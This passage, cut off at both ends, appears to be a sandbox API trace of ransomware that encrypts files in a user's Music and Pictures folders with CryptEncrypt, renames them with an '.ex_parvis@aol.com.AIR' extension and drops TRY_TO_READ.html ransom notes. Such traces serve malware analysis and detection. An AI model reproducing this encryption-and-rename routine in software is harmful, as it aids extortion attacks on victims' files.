(in: hFile=0x630, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.194] WriteFile (in: hFile=0x630, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.194] WriteFile (in: hFile=0x630, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.194] ReadFile (in: hFile=0x630, lpBuffer=0x3110048, nNumberOfBytesToRead=0x14324, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x14324, lpOverlapped=0x0) returned 1 [0173.198] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.198] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.198] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a", dwFileAttributes=0x80) returned 1 [0173.199] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a") returned 78 [0173.199] GetProcessHeap () returned 0x2e0000 [0173.199] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x32f868 [0173.199] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a" [0173.199] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0173.199] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\qs4_lbejp.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\qs4_lbejp.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.202] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\qS4_LBejP.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\qs4_lbejp.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0173.202] GetProcessHeap () returned 0x2e0000 [0173.202] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.202] GetFileSizeEx (in: hFile=0x630, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=91019) returned 1 [0173.202] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1638b [0173.202] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.202] GetProcessHeap () returned 0x2e0000 [0173.202] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.203] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.203] WriteFile (in: hFile=0x630, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.204] WriteFile (in: hFile=0x630, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.204] WriteFile (in: hFile=0x630, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.204] ReadFile (in: hFile=0x630, lpBuffer=0x3110048, nNumberOfBytesToRead=0x1638b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x1638b, lpOverlapped=0x0) returned 1 [0173.207] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.207] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.207] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav", dwFileAttributes=0x80) returned 1 [0173.208] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav") returned 86 [0173.208] GetProcessHeap () returned 0x2e0000 [0173.208] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x112) returned 0x32f868 [0173.208] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav" [0173.208] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0173.208] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\qozu2t2xyhp8ppc9o.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\qozu2t2xyhp8ppc9o.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.210] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g-s_rdMf6KkV\\ZTfz0bYDR4qhXn\\QOZu2t2xyhp8ppC9o.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g-s_rdmf6kkv\\ztfz0bydr4qhxn\\qozu2t2xyhp8ppc9o.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0173.211] GetProcessHeap () returned 0x2e0000 [0173.211] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.211] GetFileSizeEx (in: hFile=0x630, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=64097) returned 1 [0173.211] SetFilePointer (in: hFile=0x630, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xfa61 [0173.211] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.211] GetProcessHeap () returned 0x2e0000 [0173.211] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.211] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.211] WriteFile (in: hFile=0x630, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.212] WriteFile (in: hFile=0x630, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.212] WriteFile (in: hFile=0x630, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.213] ReadFile (in: hFile=0x630, lpBuffer=0x3110048, nNumberOfBytesToRead=0xfa61, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0xfa61, lpOverlapped=0x0) returned 1 [0173.215] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1bfdc40, ftCreationTime.dwHighDateTime=0x1d4d029, ftLastAccessTime.dwLowDateTime=0xb54496d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb54496d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3844f0 [0173.216] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.216] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.216] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png", dwFileAttributes=0x80) returned 1 [0173.216] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png") returned 67 [0173.216] GetProcessHeap () returned 0x2e0000 [0173.216] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x32f900 [0173.217] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png" [0173.217] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png.12781717671972518758.ex_parvis@aol.com.AIR" [0173.217] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\s8ptlxu.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\s8ptlxu.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.223] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\s8PTLXU.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\s8ptlxu.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0173.223] GetProcessHeap () returned 0x2e0000 [0173.223] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.223] GetFileSizeEx (in: hFile=0x634, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9137) returned 1 [0173.223] SetFilePointer (in: hFile=0x634, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x23b1 [0173.223] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.223] GetProcessHeap () returned 0x2e0000 [0173.223] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.223] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.223] WriteFile (in: hFile=0x634, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.225] WriteFile (in: hFile=0x634, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.225] WriteFile (in: hFile=0x634, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.229] ReadFile (in: hFile=0x634, lpBuffer=0x3d6410, nNumberOfBytesToRead=0x23b1, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3d6410*, lpNumberOfBytesRead=0x2acf9c8*=0x23b1, lpOverlapped=0x0) returned 1 [0173.230] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.230] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.230] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png", dwFileAttributes=0x80) returned 1 [0173.232] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png") returned 71 [0173.232] GetProcessHeap () returned 0x2e0000 [0173.232] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x32f868 [0173.232] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png" [0173.232] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png.12781717671972518758.ex_parvis@aol.com.AIR" [0173.232] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\c9ezbyntodq.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\c9ezbyntodq.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.242] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\C9EZBynTodq.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\c9ezbyntodq.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0173.242] GetProcessHeap () returned 0x2e0000 [0173.242] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0173.242] GetFileSizeEx (in: hFile=0x634, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=43578) returned 1 [0173.243] SetFilePointer (in: hFile=0x634, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xaa3a [0173.243] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.243] GetProcessHeap () returned 0x2e0000 [0173.243] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.243] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.243] WriteFile (in: hFile=0x634, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.244] WriteFile (in: hFile=0x634, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.244] WriteFile (in: hFile=0x634, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.246] ReadFile (in: hFile=0x634, lpBuffer=0x3110048, nNumberOfBytesToRead=0xaa3a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0xaa3a, lpOverlapped=0x0) returned 1 [0173.247] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5de4dba0, ftCreationTime.dwHighDateTime=0x1d4cfa5, ftLastAccessTime.dwLowDateTime=0xb54496d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb54496d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384530 [0173.247] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\EbstrJhT9ho0Y6gkXE-\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\ebstrjht9ho0y6gkxe-\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.249] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\fHPL7qq746b_gHI\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\fhpl7qq746b_ghi\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.251] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\XMcbtexmha5 _t25fDxE\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\xmcbtexmha5 _t25fdxe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.252] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\XTc80rDWPsbB-ynoNp\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\xtc80rdwpsbb-ynonp\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0173.256] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.256] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.256] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp", dwFileAttributes=0x80) returned 1 [0173.257] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp") returned 86 [0173.257] GetProcessHeap () returned 0x2e0000 [0173.257] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x112) returned 0x32f868 [0173.257] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\VQUbALduVG4rakEX.bmp" [0173.257] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS 